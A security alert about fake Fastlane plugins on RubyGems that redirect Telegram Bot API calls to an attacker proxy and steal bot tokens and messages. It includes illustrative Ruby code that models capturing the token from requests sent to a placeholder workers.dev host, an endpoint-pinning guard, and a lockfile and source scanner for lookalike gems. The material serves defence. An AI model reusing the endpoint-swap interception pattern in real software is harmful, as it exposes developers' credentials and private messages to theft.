Fake RubyGems Steal Telegram Bot Tokens

June 4, 2025
in Alerts

Socket researchers have uncovered two malicious packages on RubyGems, the official package manager for the Ruby language, posing as plugins for the Fastlane CI/CD tool. The packages are near-copies of a legitimate Fastlane plugin, differing in that they redirect the plugin's Telegram Bot API requests to attacker-controlled servers, which can then read everything the plugin sends: the bot token, chat IDs, message text and attached files. Socket has warned the Ruby developer community about this ongoing supply chain attack.

Fastlane is a legitimate open-source automation tool that mobile application developers use to script building, testing and releasing iOS and Android apps; it is extended through plugins, which are distributed as gems.

The legitimate plugin, fastlane-plugin-telegram, lets a Fastlane lane send notifications through a Telegram bot. The gems Socket found are nearly identical to it. The one substantive difference is that the official Telegram API endpoint (api.telegram.org) is replaced with a proxy endpoint the attacker controls, so every request the plugin makes, bot token included, passes through the attacker's server.

That single change is enough because the Bot API carries the token in the request path and the message in the body: the proxy reads bot tokens and private messages in transit, and nothing else on the developer's machine has to be modified.
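As an added illustration (not code from the page, from Socket, or from the plugin), the Ruby below models why swapping the host is sufficient: the Bot API token travels in the URL path, so whichever host terminates the request captures it along with the chat id and message. The proxy hostname and token are placeholders, RecordingProxy is a constructed stand-in for the attacker's Cloudflare Worker, and assert_official_endpoint! is a hardening guard a lane could run before any notification goes out.

```ruby
require "uri"
require "net/http"

# Telegram's Bot API puts the bot token in the URL path
# (https://api.telegram.org/bot<token>/<method>), so whichever host terminates
# the request sees the token together with the chat id and message body.
OFFICIAL_TELEGRAM_API = "https://api.telegram.org".freeze

# Minimal stand-in for the plugin's notification action. +transport+ is
# injected so the example runs offline; by default it does a real HTTPS POST.
class TelegramNotifier
  def initialize(token:, base_url: OFFICIAL_TELEGRAM_API, transport: nil)
    @token = token
    @base_url = base_url
    @transport = transport || method(:https_post)
  end

  # Builds <base_url>/bot<token>/sendMessage and submits the form body.
  def send_message(chat_id:, text:)
    uri = URI.join(@base_url, "/bot#{@token}/sendMessage")
    @transport.call(uri, { "chat_id" => chat_id.to_s, "text" => text })
  end

  private

  def https_post(uri, params)
    Net::HTTP.post_form(uri, params).body
  end
end

# Constructed model of an attacker-controlled proxy: it records every field
# it can see, then returns a normal-looking reply so the build stays green.
class RecordingProxy
  attr_reader :captured

  def initialize
    @captured = []
  end

  def call(uri, params)
    @captured << {
      host:    uri.host,
      token:   uri.path[%r{/bot([^/]+)/}, 1], # the secret is right in the path
      method:  uri.path.split("/").last,
      chat_id: params["chat_id"],
      text:    params["text"],
    }
    '{"ok":true,"result":{}}'
  end
end

class EndpointPinError < StandardError; end

# Hardening guard a lane can run before any notification goes out: refuse to
# send the bot token anywhere except the official host over HTTPS.
def assert_official_endpoint!(base_url)
  uri = URI.parse(base_url)
  unless uri.scheme == "https" && uri.host == "api.telegram.org"
    raise EndpointPinError, "refusing to send bot token to #{uri.host.inspect}"
  end
  true
end

# Runs the tampered configuration against the recording proxy. The proxy URL
# and token are placeholders for illustration, not real indicators.
def demo_interception
  proxy = RecordingProxy.new
  notifier = TelegramNotifier.new(token: "123456:EXAMPLE-TOKEN",
                                  base_url: "https://example-proxy.workers.dev",
                                  transport: proxy)
  notifier.send_message(chat_id: 42, text: "build 17 passed")
  proxy.captured.first
end

if __FILE__ == $PROGRAM_NAME
  p demo_interception
  assert_official_endpoint!("https://api.telegram.org")
end
```

The guard pins both scheme and host; a plain http:// endpoint is rejected as well, since a downgraded connection exposes the same path to anyone on the network.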

The data exposed to the proxy is the Telegram bot token, the message data itself and any uploaded files; if the user configured proxy credentials, those are captured as well. A captured bot token is a durable foothold, since Telegram bot tokens stay valid until they are manually revoked, which leaves the attacker free to read from or post to the bot's chats long after the build that leaked it. The gems' landing pages claim the proxy does not store or modify bot tokens, but Socket notes this cannot be verified: the Cloudflare Worker scripts behind the proxy are not public, so the operator can log or alter any data passing through.

This is a textbook supply chain attack: tainted gems uploaded to the official registry under names that imitate a useful tool. Nothing on the developer's machine has to hunt for secrets; the plugin hands the token over in the normal course of sending a notification, and because the gems present themselves as a proxy, notifications are expected to keep arriving, so the swap is easy to miss in a diff. Developers who installed either gem should remove it immediately, rebuild any mobile binaries produced while it was installed, and rotate every bot token that was used with it. Socket also suggests blocking network traffic to '*.workers[.]dev' unless it is explicitly needed for legitimate operations.
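A check a practitioner would want after the remediation advice above, added here as an example and not part of Socket's report or of the page: audit a Gemfile.lock for Fastlane plugins whose names imitate fastlane-plugin-telegram (exact suffix variants and typosquats within a small edit distance), and scan plugin sources for Bot-API-shaped URLs on any host other than api.telegram.org, or on any workers.dev host. The lockfile, the action source, the extra gem names and the proxy host are all constructed samples; the real malicious gem names are not given on the page.

```ruby
OFFICIAL_HOST  = "api.telegram.org".freeze
LEGITIMATE_GEM = "fastlane-plugin-telegram".freeze

# Constructed Gemfile.lock excerpt. The two extra "telegram"-looking names are
# placeholders for this example, not the real malicious gem names.
SAMPLE_LOCKFILE = <<~LOCK
  GEM
    remote: https://rubygems.org/
    specs:
      fastlane (2.227.0)
      fastlane-plugin-telegram (0.1.0)
      fastlane-plugin-telegram-example (0.1.0)
      fastlane-plugin-telegrm (1.0.0)
      fastlane-plugin-example_other (0.3.0)
LOCK

# Constructed action source shaped like the legitimate plugin, and a copy with
# the host swapped the way the page describes (placeholder proxy host).
CLEAN_SOURCE = <<~'RUBY'
  module Fastlane
    module Actions
      class TelegramAction < Action
        def self.run(params)
          uri = URI("https://api.telegram.org/bot#{params[:token]}/sendMessage")
          Net::HTTP.post_form(uri, chat_id: params[:chat_id], text: params[:text])
        end
      end
    end
  end
RUBY
TAMPERED_SOURCE = CLEAN_SOURCE.sub("https://api.telegram.org", "https://example-proxy.workers.dev")

# Plain Levenshtein distance, used to catch typosquats of "telegram".
def levenshtein(a, b)
  prev = (0..b.length).to_a
  a.each_char.with_index(1) do |ca, i|
    cur = [i]
    b.each_char.with_index(1) do |cb, j|
      cur << [prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca == cb ? 0 : 1)].min
    end
    prev = cur
  end
  prev[b.length]
end

# Gemfile.lock "specs" entries are indented four spaces; a gem's own
# dependencies are indented six, so the anchor ignores them.
def lookalike_gems(lockfile_text)
  lockfile_text.scan(/^ {4}(\S+) \(/).flatten.uniq.select do |name|
    next false if name == LEGITIMATE_GEM
    next false unless name.start_with?("fastlane-plugin-")
    name.split(/[-_]/).any? { |tok| levenshtein(tok.downcase, "telegram") <= 2 }
  end
end

URL_RE = %r{https?://([A-Za-z0-9.-]+)(?::\d+)?(/[^\s"'`]*)?}

# Hosts other than api.telegram.org that either sit under workers.dev or are
# given a Bot-API-shaped "/bot..." path in the source.
def foreign_endpoints(source_text)
  source_text.scan(URL_RE).map do |host, path|
    next if host.casecmp?(OFFICIAL_HOST)
    next unless host.end_with?(".workers.dev") || path.to_s.start_with?("/bot")
    host
  end.compact.uniq
end

def audit(lockfile_text, sources)
  {
    lookalike_gems: lookalike_gems(lockfile_text),
    foreign_endpoints: sources.flat_map { |s| foreign_endpoints(s) }.uniq,
  }
end

if __FILE__ == $PROGRAM_NAME
  p audit(SAMPLE_LOCKFILE, [CLEAN_SOURCE, TAMPERED_SOURCE])
end
```

Run it against a real project by reading Gemfile.lock and the .rb files under each installed fastlane-plugin-* gem's directory (gem contents lists them). The name heuristic is deliberately loose, so treat hits as candidates to inspect; the endpoint check is the stronger signal, because the legitimate plugin has no reason to reference any host other than api.telegram.org.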

Reference:

  • Fake Fastlane Plugins On RubyGems Steal Telegram Bot Tokens And Messages
Tags: Cyber Alerts, Cyber Alerts 2025, Cyberattack, Cybersecurity, June 2025